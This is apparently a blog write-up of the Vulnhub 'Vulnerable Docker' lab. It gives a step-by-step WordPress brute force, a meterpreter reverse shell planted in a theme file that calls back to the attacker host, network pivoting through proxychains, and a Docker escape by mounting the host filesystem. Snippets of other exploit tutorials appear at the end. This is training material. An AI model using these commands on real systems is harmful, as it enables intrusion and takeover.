[Vulnhub]: Vulnerable docker

-

Vulnerable docker 

Hello world, it is my first write up on this blog. First of all, i’m don't speak fluently, and my English is not quite good, maybe I can say wrong words or something. Anyway, lets go to the write up
At beginning, I like to do nmap
root@kali:# nmap -sC -sV -A 192.168.1.6
You can notice the ports 22, and 8000 are open, have a look what is inside of 8000 HTTP port.
A wordpress website.. with a big text, right? Ooh looks familiar like another ctf challenges, when you have some random text, one website and one wp-login page(in this case).
We need to use this pattern: cewl + john + wpscan
cewl → create a wordlist based in the website words.
john → create rules on that cewl wordlist.
wpscan → bruteforce the xmlrpc.php in the wordpress website.

You can follow these commands:
root@kali:# cewl 192.168.1.6:8000 -w cewl_wordlists
root@kali:# john --wordlist:cewl_wordlist --rules --stdout > /home/words
root@kali:# wpscan -u 192.168.1.6:8000 --wordlist /home/words

After some tries, you will get the user and the pass:
User : bob
Password: Welcome1

Lets upload our shell on whatever wordpress page. I’ll use:
http://192.168.1.6:8000/wp-content/themes/twentyseventeen/404.php

I like msfvenom to create a shell, so...
root@kali:# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=5151 -f raw > shell

copy the shell content: and place “<?php” at begin and “?>" at the end
like: <?php …..<code> … ?>

initialize the listener:
root@kali:# msfconsole -x “use multi/handler; set payload php/meterpreter/reverse_tcp; set lhost 192.168.1.2; set lport 5151; exploit -j” -q

Now we are able to get inside VM… lets do it
Open the shell, and now we are on the vm.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.2:5151
msf exploit(handler) > [*] Sending stage (37543 bytes) to 192.168.1.6
[*] Meterpreter session 1 opened (192.168.1.2:5151 -> 192.168.1.6:44138) at 2017-11-29 16:46:55 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell

Process 89 created.
Channel 0 created.
/bin/bash -i
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8f4bca8ef241: $

After that, we need to pivoting, because we are inside of a docker… which means, we are not inside the host machine… We are.. but.. ouch, you can understand, what i'm talking :p
www-data@8f4bca8ef241:$ cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.2 8f4bca8ef241

As you can see we are inside 172.18.0.0 network, lets nmap this!
meterpreter > run autoroute -s 172.18.0.0
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.18.0.0/255.255.255.0...
[+] Added route to 172.18.0.0/255.255.255.0 via 192.168.1.6
[*] Use the -p option to list all active routes

So, now we established the route. Go to /etc/proxychains.conf and change:
socks4a 127.0.0.1 9050 → socks4a 127.0.0.1 1080

Back to the metasploit, and type:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):
SRVHOST 0.0.0.0  -->   ip (localhost)
SRVPORT 1080     -->  port (1080)

msf auxiliary(socks4a) > run
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > netstat -plnt
[*] exec: netstat -plnt
tcp  0  0    0.0.0.0:1080   0.0.0.0:* LISTEN 23741/ruby ----> Listening proxychains server on port 1080

We started the socks4a server, and now we can use this server to do nmap with proxychains :)
Dont forget to change the /etc/proxychains.conf file:
socks4a 127,0.0.1 9050 ----> socks4a 127.0.0.1 1080 (at the last line of the file)

root@kali:# proxychains nmap -Pn -sT -p --top-ports 20 172.18.0.0/24
and you will get the follow output:
ips                       ports
172.18.0.1 → 22, 8000
172.18.0.2 → 3306
172.18.0.3 → 22
172.18.0.4 → 80

Maybe the pattern can appears changed, because (I guess), the containers have not static ips.
Lets connect into ssh:
root@kali:# proxychains ssh -D 127.0.0.1:1080 172.18.0.3

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.3:22-<><>-OK
bind: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 1080
Could not request local forwarding.

###############################################################
## Docker SSH ~ Because every container should be accessible ##
###############################################################
## container | content_db_1 ##
###############################################################

$ su
root@13f0a3bb2706:/#
And now, we are root.. but just in one container..lets figure out how to privesc it…
hm.....
The VM run a docker right?? lets download it :D
root@13f0a3bb2706:/# sudo apt-key adv --keyserver hkp://p80.pool.sks keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
root@13f0a3bb2706:/# echo “deb http://deb.debian.org/debian stable main” > /etc/apt/sources.list
root@13f0a3bb2706:/# apt-get update
root@13f0a3bb2706:/# apt-get install docker-engine

Now, with docker-engine downloaded, we need to use it to get another shell, the “correct” shell. Its named docker privilege escalation, you can learn more about here:
https://fosterelli.co/privilege-escalation-via-docker.html
Lets do it:
root@13f0a3bb2706:/# docker run -v /:/host -t -i bash
bash-4.4#
bash-4.4# cd host
bash-4.4# ls -la flag_3
-r-------- 1 root root 414 Aug 21 20:30 flag_3
bash-4.4# cat flag_3
--------------------------------------------------------------------------------------------------------------------------
d867a73c70770e73b65e6949dd074285dfdee80a8db333a7528390f6
Awesome so you reached host
Well done
Now the bigger challenge try to understand and fix the bugs.
If you want more attack targets look at the shadow file and try cracking passwords :P
Thanks for playing the challenges we hope you enjoyed all levels
You can send your suggestions bricks bats criticism or appreciations
on vulndocker@notsosecure.com
--------------------------------------------------------------------------------------------------------------------------

Now we have finished, getting the correct machine.
Thanks guys!, see you in the next write up \o

Comentários

Postar um comentário

Postagens mais visitadas deste blog

[Tutorial]: MS17-010 in Android world

-
Imagem
MS17-010 in Android world In this tutorial, i’ll show you guys, how to use the exploit called “Eternalblue” to attack win 7 → win 10, using a android. First of all, I would recommend to you learn about what is Eternalblue , and HOW this exploit works, aaand i’m not responsible for your actions. Be careful. In this tutorial I used: Asus zc553kl with Android 7.0 (nougat). [192.168.1.7]    Windows 7 Ultimate 64bit (Virtualbox) [192.168.1.10]. Termux app ( https://termux.com/ ) Kali Linux (x86) Hacker keyboard app (Android) STARTING First of all you need to download the termux app( on playstore ) and install it. You can learn a lot on this blog how to use termux app. Link: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/ After termux updated, you must to install our friend metasploit-framework . Use this script to install it. https://github.com/verluchie/termux-meta...
Leia mais

[Simple 90's BOF Tricks] Stack buffer overflows advanced | chapter.1

-
Imagem
Hello people around the world! Sorry for the long time to do a new blog post, i had so much work , ctf's , certificates , most people never seen this blog... that's make me really sad too.. whatever .. i'll try to start this tutorial series with objective to share my little knowledge about Stack buffer overflows and related . I have plans to post most of my knowledge acquired during my OSCE , CTF's , self studing and so on . The ideia behind this tutorials series are to explain the most detailed , possible and RESUMED exploitation techniques which are normally used on real world. Those techniques are all outdated ( yes, it is!! most of them )  once all of this stack stuffs are not exploitable anymore on big applications, such as: browsers , kernel drivers , etc . Most of the modern exploits are written to explore the dynamic memory called heap . Those  heap exploits have your own classifications like stack overflows, such as: Use-After-Free , Double-Free , Heap ...
Leia mais